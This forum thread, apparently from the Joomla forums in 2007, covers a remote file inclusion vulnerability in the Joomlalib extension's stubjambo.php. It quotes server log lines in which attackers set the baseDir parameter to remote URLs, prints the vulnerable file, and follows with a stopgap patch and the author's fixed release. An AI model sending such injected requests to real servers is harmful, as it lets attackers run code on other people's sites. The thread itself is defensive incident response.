Remote File Inclusion: Joomlalib - All versions

[dazzor]

Hi,

my provider has sand me an email with the message there was a hack attempt on the server true my site.
according to the log 'the hacker' included an external URL in stubjambo.php.

What can i do about this?

is use joomla 1.0.13
latest php and mysql

[infograf768]

Hack attempt does not mean the crack has been done.
Please ask your provider to quote the log concerning this.
Also, which version of Joomlalib and/or bsq_sitestats are you using?

[dazzor]

log:

scoutingranst.be 211.175.61.131 - - [18/Sep/2007:01:09:27 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.freewe
btown.com/v3nom/id.txt? HTTP/1.1" 200 52 "-" "libwww-perl/5.79"

i have no idea what version of Joomlalib or bsq_sitestats, the one that comes with Joomla 1.0.12

[infograf768]

They do not come with Joomla. These are 3rd party extensions.

[dazzor]

ah, but i still have no idea. Any idea where i can find this?

[RussW]

Please log in to your Joomla! Administrator site,  list the components and there you will see the versions of the installed items and their appropriate authoers websites.  Check on the authors websites for updates and/or known exploits, also check their forums for similar problems, these are  not core Joomla! extensions.

[Protozoan]

Affected component:
Joomlalib (necessary for the Gallery2 component)

The log file:
x - - [19/Sep/2007:00:21:00 +0200] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://xxxx/tmp/echo3? HTTP/1.1" 200 924 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6"

File contains:

Code: Select all

<?
/** Create a Joomla/Mambo environment for our example programs 
 * @package examples 
 */
$baseDir = dirname(__FILE__) . '/';	
/** */	
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );

$GLOBALS['database'] = $database;
?>

What do you guys suggest as fix?

[infograf768]

Merging with similar thread.
Looks like joomlalib is indeed at stake.

[55thinking]

is there a fix available ?

We affected...and we are not using the mentionned component, it got injected in our install

[amacide]

Hi,

This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...

Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file not seem to help.

If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.

Code: Select all

if(isset($_REQUEST['baseDir'])) { return FALSE;}

Cheers,

Code: Select all

<?
/** Create a Joomla/Mambo environment for our example programs 
 * @package examples 
 */}
if(isset($_REQUEST['baseDir'])) { return FALSE;}

$baseDir = dirname(__FILE__) . '/';     
/** */  
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );

$GLOBALS['database'] = $database;
?>

[Protozoan]

Hi,

This is actively being exploited. I don't think the affected file
is normally used if at all - others may be able to confirm...

Unfortunately the exploited $baseDir affects Joomla further
along the processing so fixing in this file not seem to help.

If $baseDir is set in request, then abort going no further.
This may break your sites - works fine for me.

Code: Select all

if(isset($_REQUEST['baseDir'])) { return FALSE;}

Cheers,

Code: Select all

<?
/** Create a Joomla/Mambo environment for our example programs 
 * @package examples 
 */}
if(isset($_REQUEST['baseDir'])) { return FALSE;}

$baseDir = dirname(__FILE__) . '/';     
/** */  
define('_VALID_MOS', 1); //Pretend we're Joomla
require_once($baseDir.'../../../globals.php');
require_once($baseDir.'../../../configuration.php');
require_once($baseDir .'../../../includes/mambo.php');
$database = new database( $mosConfig_host, $mosConfig_user, $mosConfig_password, $mosConfig_db, $mosConfig_dbprefix );

$GLOBALS['database'] = $database;
?>

Fix works here without complications. Thanks for your quick response.

[hamsel]

This is certainly at risk!  If the injected php code is to be believed, the attack goes way beyond the individual site being hacked for phishing purposes and right into the host's system accounts. 

I've sent a copy of the injected code to infograf678 - I hope he will comment on the code here, if he gets the time...

/hamsel

[infograf768]

Sending mails around...

[trompete]

Hi,

Infograf was nice enough to make me aware of this vulnerability. I don't think this file is being used either. I'll do a code review since it's been 9 months since I looked at it (life > internet). I'll release a new package with this file removed as soon as I can.

Brent

[trompete]

Where did JoomlaLib and BSQ go on the extensions site? That wasn't very nice.

[trompete]

I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/

I still can't find the extension site entries to update them, but here's the fixed version.

[infograf768]

Brent,
Thanks for your fast reply.
JED admins took it off until fix made. Usual policy.  We were very much worrying this morning about these reports

BSQ sitestats is concerned but also the Gallery2 extension I guess.

Please let ot2sen (Ole) know when you have uploaded new versions on joomlacode for the components too.
JM

[ot2sen]

I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/

I still can't find the extension site entries to update them, but here's the fixed version.

BSQ and Gallery2Bridge published again. Feel welcomed to update descriptions and version info. Thanks 

[dracula]

I have posted the problem in the dev forum of joomlalib, so I will just post here the link the their forum.

http://forum.4theweb.nl/showthread.php?p=5020#post5020

From my point of view, the newest joomlalib is also affected!

[infograf768]

Moving to the related thread.

[infograf768]

@trompete

Can you look into that?

[trompete]

Later. It's office hours here in the USA. I should be able to look at 8 PM CST (GMT - 6)

[Michiel_1981]

@trompete

Can you look into that?

Just looked into this with trompete, and there is NO know include like this in the code anymore, we emptied the file completly in the latest release.

so post complete file content and file name! So we can look into this.

kind regards,
Michiel

EDIT: forgot 1 word

[infograf768]

Thanks folks. 

[dracula]

thanks. didn't see this topic. and the latest link I found on 4theweb.nl was going to a 1.3.1 version which still had the problem.

[geoffjones]

Just looked at my error logs and this exploit is still being tried. Found the source from 4 origins, just in one day:
[RussW IP Addresses Removed, pointless exercise, these could be other compromised sites, via proxies or hijaked, the IP Address potentially mean nothing and do not assist with issue diagnosis or resolution ]

Put these in http://ip-address-lookup-v4.com/ to see their origins!!!!!!!!!!

I am running 1.0.15, and this directory/file does not reside on my website.

[Crwills]

I posted a new version here:
http://joomlacode.org/gf/project/joomlalib/frs/

I still can't find the extension site entries to update them, but here's the fixed version.

Thank you very much for information.